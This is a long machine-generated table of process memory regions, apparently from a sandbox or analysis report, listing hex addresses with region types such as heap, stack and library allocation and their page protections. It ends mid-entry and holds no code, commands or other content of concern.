1CAD6800000
|
heap
|
page read and write
|
||
1B9B7EF3000
|
trusted library allocation
|
page read and write
|
||
1CAD89C3000
|
heap
|
page read and write
|
||
1CAD63BE000
|
heap
|
page read and write
|
||
BD9000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
2CA537E000
|
stack
|
page read and write
|
||
20567B3D000
|
heap
|
page read and write
|
||
1CAD6810000
|
heap
|
page read and write
|
||
1CAD8C01000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
14E33CC2000
|
heap
|
page read and write
|
||
1B9B7E81000
|
trusted library allocation
|
page read and write
|
||
1CAD8E70000
|
trusted library allocation
|
page read and write
|
||
17624AD0000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD8A51000
|
heap
|
page read and write
|
||
1760C6BA000
|
trusted library allocation
|
page read and write
|
||
205679A5000
|
heap
|
page read and write
|
||
7FFD9B241000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
163A000
|
heap
|
page read and write
|
||
15C9000
|
heap
|
page read and write
|
||
1720BCE000
|
stack
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
1CAD8A33000
|
heap
|
page read and write
|
||
1887C770000
|
heap
|
page read and write
|
||
1A5EA42D000
|
heap
|
page read and write
|
||
1CAD67CE000
|
heap
|
page read and write
|
||
15F7000
|
heap
|
page read and write
|
||
7FFD9B166000
|
trusted library allocation
|
page execute and read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD6833000
|
heap
|
page read and write
|
||
20567B77000
|
heap
|
page read and write
|
||
1CAD6487000
|
heap
|
page read and write
|
||
157B000
|
heap
|
page read and write
|
||
3A88000
|
direct allocation
|
page read and write
|
||
1C2D4287000
|
heap
|
page read and write
|
||
14E37E98000
|
trusted library allocation
|
page read and write
|
||
1CAD8A35000
|
heap
|
page read and write
|
||
1A5E5CE0000
|
trusted library allocation
|
page read and write
|
||
1761C680000
|
trusted library allocation
|
page read and write
|
||
7FFD9B136000
|
trusted library allocation
|
page read and write
|
||
7FFD9B2A0000
|
trusted library allocation
|
page read and write
|
||
1760A77B000
|
heap
|
page read and write
|
||
1887E839000
|
heap
|
page read and write
|
||
18800226000
|
trusted library allocation
|
page read and write
|
||
15AD000
|
heap
|
page read and write
|
||
7FFD9B340000
|
trusted library allocation
|
page read and write
|
||
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
1887E800000
|
heap
|
page read and write
|
||
7FFD9B0B0000
|
trusted library allocation
|
page read and write
|
||
1CAD8C15000
|
trusted library allocation
|
page read and write
|
||
188012F6000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056C220000
|
trusted library allocation
|
page read and write
|
||
3F04000
|
direct allocation
|
page read and write
|
||
1CAD89FA000
|
heap
|
page read and write
|
||
2056C208000
|
trusted library allocation
|
page read and write
|
||
1CAD8E7F000
|
trusted library allocation
|
page read and write
|
||
20D000
|
unkown
|
page readonly
|
||
14E4E042000
|
heap
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
1CAD8A33000
|
heap
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
157B000
|
heap
|
page execute and read and write
|
||
231000
|
unkown
|
page readonly
|
||
2056BBF7000
|
heap
|
page read and write
|
||
246437B000
|
stack
|
page read and write
|
||
188010C4000
|
trusted library allocation
|
page read and write
|
||
2056C0C0000
|
trusted library allocation
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
3D7F000
|
heap
|
page read and write
|
||
18726235000
|
heap
|
page read and write
|
||
246453E000
|
stack
|
page read and write
|
||
7FFD9B460000
|
trusted library allocation
|
page read and write
|
||
1A5E5BB0000
|
trusted library section
|
page readonly
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D43E0000
|
heap
|
page read and write
|
||
7FFD9B280000
|
trusted library allocation
|
page read and write
|
||
1CAD8E6A000
|
trusted library allocation
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
20567AF3000
|
heap
|
page read and write
|
||
1872629B000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
1887C75A000
|
heap
|
page read and write
|
||
20567B76000
|
heap
|
page read and write
|
||
1A5EA400000
|
heap
|
page read and write
|
||
15F1000
|
heap
|
page read and write
|
||
1887C781000
|
heap
|
page read and write
|
||
1887C980000
|
trusted library allocation
|
page read and write
|
||
7FFD9B0AB000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD67F7000
|
heap
|
page read and write
|
||
17220CC000
|
stack
|
page read and write
|
||
2CA411B000
|
stack
|
page read and write
|
||
1CAD649E000
|
heap
|
page read and write
|
||
1A5E4CAF000
|
heap
|
page read and write
|
||
11DD000
|
stack
|
page read and write
|
||
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
1760C1D0000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B490000
|
trusted library allocation
|
page read and write
|
||
1760C7CC000
|
trusted library allocation
|
page read and write
|
||
1FD64FF6000
|
heap
|
page read and write
|
||
14E33D0A000
|
heap
|
page read and write
|
||
188010B7000
|
trusted library allocation
|
page read and write
|
||
188102FE000
|
trusted library allocation
|
page read and write
|
||
2056BBF2000
|
heap
|
page read and write
|
||
1CAD6557000
|
trusted library allocation
|
page read and write
|
||
2056BCE8000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
187262B2000
|
heap
|
page read and write
|
||
1B9A7FD6000
|
trusted library allocation
|
page read and write
|
||
1CAD649A000
|
heap
|
page read and write
|
||
2CA5FFE000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567B22000
|
heap
|
page read and write
|
||
14E33C00000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
1760A6C8000
|
heap
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
20567B8A000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2CA5C7E000
|
unkown
|
page readonly
|
||
2056C160000
|
trusted library allocation
|
page read and write
|
||
18726214000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
231000
|
unkown
|
page readonly
|
||
3974000
|
heap
|
page read and write
|
||
14E33EB0000
|
heap
|
page readonly
|
||
1618000
|
heap
|
page read and write
|
||
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
11BF000
|
stack
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
1760CB90000
|
trusted library allocation
|
page read and write
|
||
1A5E4CAB000
|
heap
|
page read and write
|
||
1CAD67F7000
|
heap
|
page read and write
|
||
1CAD6489000
|
heap
|
page read and write
|
||
1CAD646A000
|
heap
|
page read and write
|
||
20567B26000
|
heap
|
page read and write
|
||
1CAD67CE000
|
heap
|
page read and write
|
||
44C0000
|
direct allocation
|
page read and write
|
||
7FFD9B083000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD641A000
|
heap
|
page read and write
|
||
3D76000
|
heap
|
page read and write
|
||
1CAD67E5000
|
heap
|
page read and write
|
||
18801183000
|
trusted library allocation
|
page read and write
|
||
1A5E4D29000
|
heap
|
page read and write
|
||
1CAD65D3000
|
trusted library allocation
|
page read and write
|
||
14E33CE2000
|
heap
|
page read and write
|
||
20567B39000
|
heap
|
page read and write
|
||
17214FE000
|
stack
|
page read and write
|
||
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
4234000
|
direct allocation
|
page read and write
|
||
1887C799000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567989000
|
heap
|
page read and write
|
||
1CAD8CC0000
|
trusted library allocation
|
page read and write
|
||
14E38375000
|
trusted library allocation
|
page read and write
|
||
20567B88000
|
heap
|
page read and write
|
||
20567B20000
|
heap
|
page read and write
|
||
1CAD8A38000
|
heap
|
page read and write
|
||
1760C776000
|
trusted library allocation
|
page read and write
|
||
7FFD9B3A0000
|
trusted library allocation
|
page read and write
|
||
20566CD0000
|
trusted library allocation
|
page read and write
|
||
1FD6504E000
|
heap
|
page read and write
|
||
1720B83000
|
stack
|
page read and write
|
||
1CAD63B0000
|
heap
|
page read and write
|
||
1CAD8B35000
|
trusted library allocation
|
page read and write
|
||
18726230000
|
heap
|
page read and write
|
||
1A5E4C1E000
|
heap
|
page read and write
|
||
1872622B000
|
heap
|
page read and write
|
||
1CAD8932000
|
heap
|
page read and write
|
||
2CA667E000
|
stack
|
page read and write
|
||
1CAD88FC000
|
heap
|
page read and write
|
||
18726238000
|
heap
|
page read and write
|
||
1CAD6463000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
163D000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
2056BC38000
|
heap
|
page read and write
|
||
2056798D000
|
heap
|
page read and write
|
||
2CA56FE000
|
unkown
|
page readonly
|
||
3F80000
|
direct allocation
|
page read and write
|
||
1C2D421E000
|
heap
|
page read and write
|
||
20567B71000
|
heap
|
page read and write
|
||
159C000
|
heap
|
page read and write
|
||
7FFD9B420000
|
trusted library allocation
|
page read and write
|
||
7FFD9B2A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B15C000
|
trusted library allocation
|
page execute and read and write
|
||
15CC000
|
heap
|
page read and write
|
||
1B9A823A000
|
trusted library allocation
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD8C05000
|
trusted library allocation
|
page read and write
|
||
1FD65017000
|
heap
|
page read and write
|
||
171000
|
unkown
|
page execute read
|
||
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679A5000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD63A9000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
7FFD9B449000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
15C4000
|
heap
|
page execute and read and write
|
||
2056BBFB000
|
heap
|
page read and write
|
||
11FF000
|
stack
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
7FFD9B370000
|
trusted library allocation
|
page read and write
|
||
7FFD9B458000
|
trusted library allocation
|
page read and write
|
||
205679F6000
|
heap
|
page read and write
|
||
1CAD682F000
|
heap
|
page read and write
|
||
1CAD8E64000
|
trusted library allocation
|
page read and write
|
||
14CA000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B460000
|
trusted library allocation
|
page read and write
|
||
1872B4E0000
|
heap
|
page read and write
|
||
7FFD9B4A0000
|
trusted library allocation
|
page read and write
|
||
9EE80FB000
|
stack
|
page read and write
|
||
1FD65050000
|
heap
|
page read and write
|
||
1CAD63AF000
|
heap
|
page read and write
|
||
18726217000
|
heap
|
page read and write
|
||
83480FB000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1887C940000
|
heap
|
page read and write
|
||
38D6000
|
heap
|
page read and write
|
||
14E35E54000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567B03000
|
heap
|
page read and write
|
||
15EB000
|
heap
|
page read and write
|
||
1CAD6498000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
7FFD9B3E0000
|
trusted library allocation
|
page read and write
|
||
1B9A5DE7000
|
heap
|
page read and write
|
||
205679CC000
|
heap
|
page read and write
|
||
1FD65040000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1880007D000
|
trusted library allocation
|
page read and write
|
||
1CAD67F7000
|
heap
|
page read and write
|
||
2CA66FE000
|
unkown
|
page readonly
|
||
1CAD8934000
|
heap
|
page read and write
|
||
1A5E4C5B000
|
heap
|
page read and write
|
||
187264F0000
|
heap
|
page read and write
|
||
7DA8CFE000
|
stack
|
page read and write
|
||
83482FD000
|
stack
|
page read and write
|
||
1CAD8A35000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679F6000
|
heap
|
page read and write
|
||
1760A8F0000
|
heap
|
page read and write
|
||
1CAD65D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B260000
|
trusted library allocation
|
page execute and read and write
|
||
2056BC7A000
|
heap
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
1A5EA1B0000
|
trusted library allocation
|
page read and write
|
||
20567B0F000
|
heap
|
page read and write
|
||
1CAD8E7D000
|
trusted library allocation
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
18810013000
|
trusted library allocation
|
page read and write
|
||
7FFD9B0FC000
|
trusted library allocation
|
page execute and read and write
|
||
1B9A7FA0000
|
trusted library allocation
|
page read and write
|
||
1887E920000
|
heap
|
page read and write
|
||
1C2D42F7000
|
heap
|
page read and write
|
||
1CAD6487000
|
heap
|
page read and write
|
||
2056BC31000
|
heap
|
page read and write
|
||
38DB000
|
heap
|
page read and write
|
||
18800DB5000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
3A40000
|
direct allocation
|
page read and write
|
||
1FD64FD5000
|
heap
|
page read and write
|
||
1C2D5D60000
|
heap
|
page read and write
|
||
2056BC5C000
|
heap
|
page read and write
|
||
2056BBF2000
|
heap
|
page read and write
|
||
1CAD6556000
|
trusted library allocation
|
page read and write
|
||
20567B24000
|
heap
|
page read and write
|
||
1887EBF2000
|
heap
|
page read and write
|
||
1CAD8A38000
|
heap
|
page read and write
|
||
1FD6500B000
|
heap
|
page read and write
|
||
1A5EA1E0000
|
trusted library allocation
|
page read and write
|
||
20567B33000
|
heap
|
page read and write
|
||
20567B28000
|
heap
|
page read and write
|
||
1A5EA26A000
|
trusted library allocation
|
page read and write
|
||
2056C120000
|
trusted library allocation
|
page read and write
|
||
205679B1000
|
heap
|
page read and write
|
||
3A49000
|
heap
|
page read and write
|
||
1502000
|
heap
|
page read and write
|
||
25E077E000
|
stack
|
page read and write
|
||
14E4E04A000
|
heap
|
page read and write
|
||
20567B28000
|
heap
|
page read and write
|
||
1CAD63C4000
|
heap
|
page read and write
|
||
1CAD67F7000
|
heap
|
page read and write
|
||
1CAD8E6F000
|
trusted library allocation
|
page read and write
|
||
1760C7C5000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD88ED000
|
heap
|
page read and write
|
||
1CAD8907000
|
heap
|
page read and write
|
||
18810015000
|
trusted library allocation
|
page read and write
|
||
1FD65026000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
2CA46F7000
|
stack
|
page read and write
|
||
187262B2000
|
heap
|
page read and write
|
||
15A7000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD65E0000
|
trusted library allocation
|
page read and write
|
||
1A5EA4CE000
|
heap
|
page read and write
|
||
14E360D9000
|
trusted library allocation
|
page read and write
|
||
2CA5DF9000
|
stack
|
page read and write
|
||
17211F9000
|
stack
|
page read and write
|
||
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
20567B7D000
|
heap
|
page read and write
|
||
20567998000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B340000
|
trusted library allocation
|
page read and write
|
||
1B9B7E90000
|
trusted library allocation
|
page read and write
|
||
3DDD000
|
heap
|
page read and write
|
||
1A5E4C78000
|
heap
|
page read and write
|
||
7FFD9B0CD000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD8E65000
|
trusted library allocation
|
page read and write
|
||
7FFD9B220000
|
trusted library allocation
|
page read and write
|
||
1CAD8E80000
|
trusted library allocation
|
page read and write
|
||
18800ABD000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8C80000
|
trusted library allocation
|
page read and write
|
||
18726217000
|
heap
|
page read and write
|
||
18726204000
|
heap
|
page read and write
|
||
1CAD649D000
|
heap
|
page read and write
|
||
7FFD9B272000
|
trusted library allocation
|
page read and write
|
||
7FFD9B150000
|
trusted library allocation
|
page read and write
|
||
1601000
|
heap
|
page read and write
|
||
2056C0E0000
|
trusted library allocation
|
page read and write
|
||
1A5E4CB9000
|
heap
|
page read and write
|
||
1CAD88F7000
|
heap
|
page read and write
|
||
20567B24000
|
heap
|
page read and write
|
||
165C000
|
heap
|
page read and write
|
||
1760C580000
|
heap
|
page readonly
|
||
391F000
|
heap
|
page read and write
|
||
7FFD9B3B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B231000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
166E000
|
heap
|
page read and write
|
||
2056BBFB000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
1760A7B8000
|
heap
|
page read and write
|
||
14E374E9000
|
trusted library allocation
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
1613000
|
heap
|
page read and write
|
||
1CAD6800000
|
heap
|
page read and write
|
||
1872629D000
|
heap
|
page read and write
|
||
23D000
|
unkown
|
page read and write
|
||
14E36AE9000
|
trusted library allocation
|
page read and write
|
||
7FFD9B310000
|
trusted library allocation
|
page read and write
|
||
3CED000
|
heap
|
page read and write
|
||
1887C7D1000
|
heap
|
page read and write
|
||
2056BB5E000
|
heap
|
page read and write
|
||
1CAD899F000
|
heap
|
page read and write
|
||
20567B77000
|
heap
|
page read and write
|
||
1887C990000
|
heap
|
page readonly
|
||
7FFD9B380000
|
trusted library allocation
|
page read and write
|
||
7FFD9B084000
|
trusted library allocation
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
1A5EA1B8000
|
trusted library allocation
|
page read and write
|
||
3A51000
|
heap
|
page read and write
|
||
1760C100000
|
heap
|
page read and write
|
||
1762485B000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1B9A5DED000
|
heap
|
page read and write
|
||
14E4E091000
|
heap
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
1B9A8350000
|
trusted library allocation
|
page read and write
|
||
20567B39000
|
heap
|
page read and write
|
||
1A5E4BF0000
|
heap
|
page read and write
|
||
20566D98000
|
trusted library allocation
|
page read and write
|
||
7FFD9B3D0000
|
trusted library allocation
|
page read and write
|
||
9EE7EFE000
|
stack
|
page read and write
|
||
2056AD60000
|
trusted library allocation
|
page read and write
|
||
14E4DD3C000
|
heap
|
page read and write
|
||
2CA52FE000
|
unkown
|
page readonly
|
||
1A5E5500000
|
heap
|
page read and write
|
||
2056BC38000
|
heap
|
page read and write
|
||
1A5EA280000
|
trusted library allocation
|
page read and write
|
||
1A5EA214000
|
trusted library allocation
|
page read and write
|
||
20567AFA000
|
heap
|
page read and write
|
||
1CAD8A35000
|
heap
|
page read and write
|
||
20567946000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD6483000
|
heap
|
page read and write
|
||
1553000
|
heap
|
page execute and read and write
|
||
14E356F0000
|
heap
|
page read and write
|
||
7FFD9B423000
|
trusted library allocation
|
page read and write
|
||
1760C69B000
|
trusted library allocation
|
page read and write
|
||
1C2D4229000
|
heap
|
page read and write
|
||
1CAD6487000
|
heap
|
page read and write
|
||
1CAD6521000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D42DB000
|
heap
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
28999E000
|
stack
|
page read and write
|
||
2056BB54000
|
heap
|
page read and write
|
||
20567991000
|
heap
|
page read and write
|
||
2056BB64000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B3D0000
|
trusted library allocation
|
page read and write
|
||
20566BD6000
|
heap
|
page read and write
|
||
7FFD9B4F0000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
14E4DD53000
|
heap
|
page read and write
|
||
14E45C31000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5EA23E000
|
trusted library allocation
|
page read and write
|
||
14E45C5F000
|
trusted library allocation
|
page read and write
|
||
1A5EA310000
|
trusted library allocation
|
page read and write
|
||
25E087E000
|
stack
|
page read and write
|
||
1C2D41C0000
|
heap
|
page read and write
|
||
1CAD8C11000
|
trusted library allocation
|
page read and write
|
||
2056BBF2000
|
heap
|
page read and write
|
||
1887ECBA000
|
heap
|
page read and write
|
||
2056BB5D000
|
heap
|
page read and write
|
||
2056BE13000
|
trusted library allocation
|
page read and write
|
||
187262B2000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
14E4DFB2000
|
heap
|
page read and write
|
||
2056BAB0000
|
heap
|
page read and write
|
||
24646B8000
|
stack
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
2056BC36000
|
heap
|
page read and write
|
||
1CAD67B0000
|
heap
|
page read and write
|
||
2CA50FB000
|
stack
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
2056BC3C000
|
heap
|
page read and write
|
||
1721FCE000
|
stack
|
page read and write
|
||
7FFD9B370000
|
trusted library allocation
|
page read and write
|
||
1A5E4C43000
|
heap
|
page read and write
|
||
1C2D42A2000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B2E0000
|
trusted library allocation
|
page read and write
|
||
2056BBF7000
|
heap
|
page read and write
|
||
2056BC36000
|
heap
|
page read and write
|
||
205679C8000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
2CA4CFC000
|
stack
|
page read and write
|
||
1CAD643F000
|
heap
|
page read and write
|
||
2CA527E000
|
stack
|
page read and write
|
||
24641FE000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679B8000
|
heap
|
page read and write
|
||
14E4DDF0000
|
heap
|
page read and write
|
||
1FD65050000
|
heap
|
page read and write
|
||
2084000
|
heap
|
page read and write
|
||
1CAD6432000
|
heap
|
page read and write
|
||
1CAD8E61000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1760A6C0000
|
heap
|
page read and write
|
||
1CAD67E5000
|
heap
|
page read and write
|
||
1CAD8A33000
|
heap
|
page read and write
|
||
1CAD6832000
|
heap
|
page read and write
|
||
205679CC000
|
heap
|
page read and write
|
||
1A5E4C9B000
|
heap
|
page read and write
|
||
1CAD641A000
|
heap
|
page read and write
|
||
1887E893000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
20567B22000
|
heap
|
page read and write
|
||
7FFD9B270000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD63B1000
|
heap
|
page read and write
|
||
20567940000
|
heap
|
page read and write
|
||
2056BC38000
|
heap
|
page read and write
|
||
15F1000
|
heap
|
page read and write
|
||
1B9BFEA0000
|
heap
|
page read and write
|
||
1CAD8D80000
|
trusted library allocation
|
page read and write
|
||
20566D05000
|
trusted library allocation
|
page read and write
|
||
1618000
|
heap
|
page read and write
|
||
7FFD9B260000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B09B000
|
trusted library allocation
|
page read and write
|
||
1C2D42DB000
|
heap
|
page read and write
|
||
1CAD6483000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD6809000
|
heap
|
page read and write
|
||
7FFD9B440000
|
trusted library allocation
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
1CAD89C3000
|
heap
|
page read and write
|
||
1C2D5BBC000
|
heap
|
page read and write
|
||
7FFD9B9AC000
|
trusted library allocation
|
page read and write
|
||
1A5EA2AC000
|
trusted library allocation
|
page read and write
|
||
1887C6D0000
|
heap
|
page read and write
|
||
1CAD63A0000
|
heap
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
1760A716000
|
heap
|
page read and write
|
||
17624800000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
7FFD9B480000
|
trusted library allocation
|
page read and write
|
||
1C2D4210000
|
heap
|
page read and write
|
||
2056BC31000
|
heap
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
2CA49FE000
|
unkown
|
page readonly
|
||
2056BC36000
|
heap
|
page read and write
|
||
7FFD9B450000
|
trusted library allocation
|
page read and write
|
||
17624ADF000
|
heap
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1CAD8E7E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B410000
|
trusted library allocation
|
page read and write
|
||
1CAD8E77000
|
trusted library allocation
|
page read and write
|
||
15F7000
|
heap
|
page read and write
|
||
1B9A5DA1000
|
heap
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
1B9A5DAD000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8907000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
1CAD8D60000
|
trusted library allocation
|
page read and write
|
||
20567B24000
|
heap
|
page read and write
|
||
1CAD647D000
|
heap
|
page read and write
|
||
1C2D42F6000
|
heap
|
page read and write
|
||
1760A670000
|
heap
|
page read and write
|
||
2056BB4F000
|
heap
|
page read and write
|
||
1C2D5D6D000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5E5370000
|
trusted library section
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD649A000
|
heap
|
page read and write
|
||
20567A90000
|
remote allocation
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
7FFD9B090000
|
trusted library allocation
|
page read and write
|
||
1CAD6141000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1FD6525E000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
187264FC000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
7FFD9B242000
|
trusted library allocation
|
page read and write
|
||
2056ACC1000
|
trusted library allocation
|
page read and write
|
||
4348000
|
direct allocation
|
page read and write
|
||
20566D60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B458000
|
trusted library allocation
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
205679C3000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
2056BD22000
|
trusted library allocation
|
page read and write
|
||
1B9A7740000
|
heap
|
page execute and read and write
|
||
1A5E6120000
|
trusted library allocation
|
page read and write
|
||
20566BD2000
|
heap
|
page read and write
|
||
7DA8DFE000
|
stack
|
page read and write
|
||
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1A5E4D02000
|
heap
|
page read and write
|
||
1CAD67E1000
|
heap
|
page read and write
|
||
1B9A7C90000
|
heap
|
page read and write
|
||
14E37B8D000
|
trusted library allocation
|
page read and write
|
||
1B9BFF80000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
1887CA80000
|
heap
|
page read and write
|
||
14E4E0C6000
|
heap
|
page read and write
|
||
1CAD6800000
|
heap
|
page read and write
|
||
24642FD000
|
stack
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
1B9A7CC5000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1414000
|
heap
|
page read and write
|
||
1CAD88E0000
|
heap
|
page read and write
|
||
1CAD6832000
|
heap
|
page read and write
|
||
1CAD67E1000
|
heap
|
page read and write
|
||
14E3602F000
|
trusted library allocation
|
page read and write
|
||
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
1760C5F0000
|
heap
|
page execute and read and write
|
||
1A5EA4EF000
|
heap
|
page read and write
|
||
172204D000
|
stack
|
page read and write
|
||
1887C825000
|
heap
|
page read and write
|
||
1CAD8B20000
